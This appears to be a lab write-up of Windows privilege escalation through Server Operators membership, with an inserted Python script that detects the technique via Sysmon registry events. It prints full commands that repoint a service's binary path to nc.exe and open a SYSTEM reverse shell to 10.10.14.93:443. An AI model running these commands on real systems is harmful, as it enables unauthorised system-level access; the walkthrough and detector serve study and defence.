⚪ Server Operators

Information

The Server Operators group/privilege grants its members the ability to create, stop, start and restart services.
(To abuse Server Operators, we create a malicious service with a reverse shell that will run when the service is restarted)

Identify Privileges

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group


*Evil-WinRM* PS C:\> net user svc-printer
Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators

Create Service

*Evil-WinRM* PS C:\> sc.exe create reverse binPath="nc.exe -e cmd 10.10.14.93 443"
Permissions Error

When creating a new service, it can sometimes fail due to a lack of permissions.

*Evil-WinRM* PS C:\> sc.exe create reverse binPath="nc.exe -e cmd 10.10.14.93 443"

[SC] OpenSCManager FAILED 5:

Access is denied.

Show Services

I list the existing services in order to try to modify one of them

*Evil-WinRM* PS C:\> services

Path                                                                                                                 Privileges Service          
----                                                                                                                 ---------- -------          
\\10.10.14.93\a\nc.exe -e cmd 10.10.14.93 443                                                                              True ADWS             
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys       True MpKslceeb2796    
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                              True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe                                                                                           True PerfHost         
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                 False Sense            
C:\Windows\servicing\TrustedInstaller.exe                                                                                  False TrustedInstaller 
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                     True VGAuthService    
C:\Users\svc-printer\AppData\Local\Temp\nc.exe -e cmd 10.10.14.93 443                                                      True VMTools          
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"                                             True WdNisSvc         
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"                                            True WinDefend        
"C:\Program Files\Windows Media Player\wmpnetwk.exe"

Modify Service

I modify the VMTools service so that it points to the uploaded nc.exe, then I stop and start the service.

*Evil-WinRM* PS C:\Users\svc-printer\> cd $env:TEMP
*Evil-WinRM* PS C:\Users\svc-printer\AppData\Local\Temp> upload nc.exe

*Evil-WinRM* PS C:\Users\svc-printer\AppData\Local\Temp> sc.exe config VMTools binPath="C:\Users\svc-printer\AppData\Local\Temp\nc.exe -e cmd 10.10.14.93 443"
[SC] ChangeServiceConfig SUCCESS

*Evil-WinRM* PS C:\Users\svc-printer\AppData\Local\Temp> sc.exe stop VMTools
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\svc-printer\AppData\Local\Temp> sc.exe start VMTools
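From the defender's side, the step above leaves a clear trace: the service's ImagePath registry value is rewritten to point at a binary in a user-writable location (or a UNC share, as the ADWS entry in the service listing shows). The following Python script is an added example, not part of the original note or of any tool it uses. It checks two inputs for that pattern: Sysmon Event ID 13 (RegistryEvent, value set) records whose TargetObject is a service ImagePath, and a snapshot of current service binary paths such as the one the `services` command printed. The event field names (EventID, Image, TargetObject, Details) follow Sysmon's schema; the sample records and the snapshot are constructed here to mirror the session on this page, and the path heuristics are an assumption of what a "service binary should not live here" rule looks like, not a vendor rule.

```python
"""Detect service binary-path tampering of the kind a Server Operators
member can perform with `sc.exe config <svc> binPath=...`.

Input 1: Sysmon Event ID 13 records (registry value set).
Input 2: a snapshot of service name -> configured binary path.
All sample data below is constructed for this example.
"""
import re
from dataclasses import dataclass

SYSMON_REGISTRY_VALUE_SET = 13  # Sysmon EventID 13 = "RegistryEvent (Value Set)"

# The ImagePath value of any service key; group 1 captures the service name.
IMAGE_PATH_RE = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.I
)

# Heuristics (assumption for this example): places a service binary should not live.
SUSPICIOUS_PATH_PATTERNS = (
    (re.compile(r"^\\\\"), "binary loaded from a UNC share"),
    (re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I), "binary under a user profile's AppData"),
    (re.compile(r"\\Temp\\", re.I), "binary under a Temp directory"),
)


@dataclass(frozen=True)
class Finding:
    service: str
    path: str
    reason: str


def normalize_path(value: str) -> str:
    """Strip the NT '\\??\\' prefix and a leading quote that SCM paths often carry."""
    value = value.strip()
    if value.startswith("\\??\\"):
        value = value[4:]
    if value.startswith('"'):
        value = value[1:]  # the closing quote does not affect pattern matching
    return value


def suspicious_reason(path: str):
    """Return the first matching reason, or None if the path looks normal."""
    for pattern, reason in SUSPICIOUS_PATH_PATTERNS:
        if pattern.search(path):
            return reason
    return None


def check_image_path_events(events):
    """Flag Sysmon 13 events that set a service ImagePath to a suspicious location.
    Note: the SCM (services.exe) writes the value on behalf of sc.exe, so the
    Image field names services.exe; correlate with process-creation events
    for sc.exe to find the requesting user."""
    findings = []
    for ev in events:
        if ev.get("EventID") != SYSMON_REGISTRY_VALUE_SET:
            continue
        match = IMAGE_PATH_RE.match(ev.get("TargetObject", ""))
        if not match:
            continue  # some other registry value, not a service binary path
        path = normalize_path(ev.get("Details", ""))
        reason = suspicious_reason(path)
        if reason:
            findings.append(Finding(match.group(1), path, reason))
    return findings


def check_service_snapshot(services):
    """Flag services whose currently configured binary path is suspicious."""
    findings = []
    for name, raw in services.items():
        path = normalize_path(raw)
        reason = suspicious_reason(path)
        if reason:
            findings.append(Finding(name, path, reason))
    return findings


# Constructed sample records, shaped like Sysmon 13 events for this page's session.
SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath",
     "Details": r"C:\Users\svc-printer\AppData\Local\Temp\nc.exe -e cmd 10.10.14.93 443"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\ADWS\ImagePath",
     "Details": r"\\10.10.14.93\a\nc.exe -e cmd 10.10.14.93 443"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\WinDefend\ImagePath",
     "Details": r'"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"'},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\Start",
     "Details": "DWORD (0x00000002)"},  # start-type change, not an ImagePath write
]

# Constructed snapshot mirroring the `services` listing above.
SAMPLE_SERVICES = {
    "ADWS": r"\\10.10.14.93\a\nc.exe -e cmd 10.10.14.93 443",
    "MpKslceeb2796": r"\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys",
    "NetTcpPortSharing": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe",
    "PerfHost": r"C:\Windows\SysWow64\perfhost.exe",
    "TrustedInstaller": r"C:\Windows\servicing\TrustedInstaller.exe",
    "VMTools": r"C:\Users\svc-printer\AppData\Local\Temp\nc.exe -e cmd 10.10.14.93 443",
    "WinDefend": r'"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"',
}

if __name__ == "__main__":
    for f in check_image_path_events(SAMPLE_EVENTS) + check_service_snapshot(SAMPLE_SERVICES):
        print(f"{f.service}: {f.reason} -> {f.path}")
```

For the event-based check to fire in production, the Sysmon configuration must actually log value writes under `HKLM\System\CurrentControlSet\Services`; the snapshot check needs no event logging and can be run periodically against `Win32_Service` PathName values. Both flag only where the binary lives, which is deliberate: a legitimate path with malicious arguments still needs the process-creation and network telemetry that follow the service start.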

Reverse Shell

I obtain the shell as the user nt authority\system

 rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.95.241] 54692
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

© d4t4s3c 2025
